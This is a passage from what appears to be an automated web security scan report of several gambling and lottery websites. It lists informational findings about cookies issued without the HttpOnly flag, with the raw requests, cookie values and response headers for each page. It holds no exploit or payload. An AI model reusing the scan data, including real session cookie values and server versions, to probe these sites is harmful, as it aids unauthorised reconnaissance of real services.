CSI_7=EncryptedUniqueVisitorID=C548B75C9F7390F385377C4ED8CF162F&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:27 GMT; path=/
UniqueVisitorID=C548B75C9F7390F385377C4ED8CF162F; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:27 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.286. http://www.pclscratch.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pclscratch.com
Path:	/Promotions.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_7=EncryptedUniqueVisitorID=46A3A7DF4BF4F50E90C45E692E9AAA6F&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:02:49 GMT; path=/
UniqueVisitorID=46A3A7DF4BF4F50E90C45E692E9AAA6F; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Promotions.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.287. http://www.pclscratch.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pclscratch.com
Path:	/Responsible.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_7=EncryptedUniqueVisitorID=D72E0122F49CBF97115FA2773E7773A1&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:22 GMT; path=/
UniqueVisitorID=D72E0122F49CBF97115FA2773E7773A1; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.288. http://www.pclscratch.com/SecurityAndPrivacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pclscratch.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_7=EncryptedUniqueVisitorID=1DC262F52B431C9D115D25E0547C20DB&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:03:15 GMT; path=/
UniqueVisitorID=1DC262F52B431C9D115D25E0547C20DB; domain=pclscratch.com; expires=Fri, 16-May-2014 12:03:15 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.289. http://www.pclscratch.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pclscratch.com
Path:	/Terms.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_7=EncryptedUniqueVisitorID=6D993A2BDAB0681042C0ACA13C1AEB28&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:02:50 GMT; path=/
UniqueVisitorID=6D993A2BDAB0681042C0ACA13C1AEB28; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.pclscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nsnjci453g20ax45pj1enb55; path=/; HttpOnly
Set-Cookie: CSI_7=EncryptedUniqueVisitorID=6D993A2BDAB0681042C0ACA13C1AEB28&AffiliateID=7&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=pclscratch.com; expires=Fri, 16-May-2031 12:02:50 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: BO=FM; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: UniqueVisitorID=6D993A2BDAB0681042C0ACA13C1AEB28; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: CountryCode=US; domain=pclscratch.com; expires=Fri, 16-May-2014 12:02:50 GMT; path=/
Set-Cookie: CSITemp=7; domain=pclscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 92895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.290. http://www.postcodelottery.com/AboutUs.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/AboutUs.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.291. http://www.postcodelottery.com/AboutUs/PrivacyPolicy.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/AboutUs/PrivacyPolicy.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.292. http://www.postcodelottery.com/AboutUs/TermsAndConditions.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/AboutUs/TermsAndConditions.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.293. http://www.postcodelottery.com/Charities.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/Charities.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.294. http://www.postcodelottery.com/DrawResults.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/DrawResults.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.295. http://www.postcodelottery.com/FunGames.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/FunGames.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.296. http://www.postcodelottery.com/FunGames/FreeGames.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/FunGames/FreeGames.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.297. http://www.postcodelottery.com/FunGames/PaidGames.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/FunGames/PaidGames.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:45 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:20:45 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 11318

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

12.298. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/FunGames/PaidGames/PostcodeLotteryScratch.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.299. http://www.postcodelottery.com/FunGames/PostcodeChallenge.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/FunGames/PostcodeChallenge.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:20:45 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:20:46 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 10718

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

12.300. http://www.postcodelottery.com/Games/Scratchcards.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/Games/Scratchcards.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.301. http://www.postcodelottery.com/Home.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/Home.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.302. http://www.postcodelottery.com/HowItWorks.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/HowItWorks.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.303. http://www.postcodelottery.com/MyAccount.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/MyAccount.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.304. http://www.postcodelottery.com/RSS.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/RSS.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.305. http://www.postcodelottery.com/Sitemap.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postcodelottery.com
Path:	/Sitemap.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.306. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.postcodelottery.com
Path:	/PlayNOW/OrderYourTickets.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.307. http://www.primescratchcards.com/HelpDepositMethods.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/HelpDepositMethods.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:34:54 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /HelpDepositMethods.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

12.308. http://www.primescratchcards.com/InviteFriend.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/InviteFriend.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

12.309. http://www.primescratchcards.com/Responsible.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/Responsible.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:34:50 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

12.310. http://www.primescratchcards.com/SecurityAndPrivacy.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/SecurityAndPrivacy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20508
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.311. http://www.primescratchcards.com/aboutus.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/aboutus.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:34:30 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aboutus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

12.312. http://www.primescratchcards.com/affiliates.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/affiliates.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:34:34 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /affiliates.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

12.313. http://www.primescratchcards.com/contactus.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/contactus.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:34:52 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contactus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

12.314. http://www.primescratchcards.com/fairplay.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/fairplay.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:34:30 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fairplay.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

12.315. http://www.primescratchcards.com/help.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/help.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:34:34 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

12.316. http://www.primescratchcards.com/media.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/media.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:34:52 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

12.317. http://www.primescratchcards.com/playersclub.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/playersclub.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /playersclub.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25777
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.318. http://www.primescratchcards.com/promotions.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.primescratchcards.com
Path:	/promotions.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 21865
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
